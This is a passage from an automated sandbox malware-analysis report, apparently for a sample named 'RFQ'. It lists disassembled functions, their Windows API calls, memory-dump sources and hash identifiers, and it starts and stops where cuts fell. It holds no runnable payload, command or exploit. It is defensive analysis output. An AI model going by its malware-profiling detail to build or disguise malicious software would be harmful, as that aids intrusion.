                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                          • SendMessageW.USER32 ref: 00471AE3
                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                          • String ID:
                                                                          • API String ID: 3611059338-0
                                                                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                          Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                                          • String ID:
                                                                          • API String ID: 1640429340-0
                                                                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                          Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • _wcslen.LIBCMT ref: 004438CD
                                                                          • _wcslen.LIBCMT ref: 004438E6
                                                                          • _wcstok.LIBCMT ref: 004438F8
                                                                          • _wcslen.LIBCMT ref: 0044390C
                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                          • _wcstok.LIBCMT ref: 00443931
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 3632110297-0
                                                                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                          Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 752480666-0
                                                                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                          Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                          • String ID:
                                                                          • API String ID: 3275902921-0
                                                                          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                          Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                          • String ID:
                                                                          • API String ID: 3275902921-0
                                                                          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                          Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                          • String ID:
                                                                          • API String ID: 2833360925-0
                                                                          • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                          • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                          • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                          • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                          Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32 ref: 004555C7
                                                                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 3691411573-0
                                                                          • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                          • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                          • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                          • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                          Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                          • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                          • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                          • EndPath.GDI32(?), ref: 004472D6
                                                                          • StrokePath.GDI32(?), ref: 004472E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                          • String ID:
                                                                          • API String ID: 372113273-0
                                                                          • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                          • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                          • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                          • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                          Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0044CC6D
                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                          • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                          • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                          • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                          Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 0041708E
                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                          • __amsg_exit.LIBCMT ref: 004170AE
                                                                          • __lock.LIBCMT ref: 004170BE
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                          • _free.LIBCMT ref: 004170EE
                                                                          • InterlockedIncrement.KERNEL32(03042DA0), ref: 00417106
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                          • String ID:
                                                                          • API String ID: 3470314060-0
                                                                          • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                          • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                          • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                          • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                          Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                            • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3495660284-0
                                                                          • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                          • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                          • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                          • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                          Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                          • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                          • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                          • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                          Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
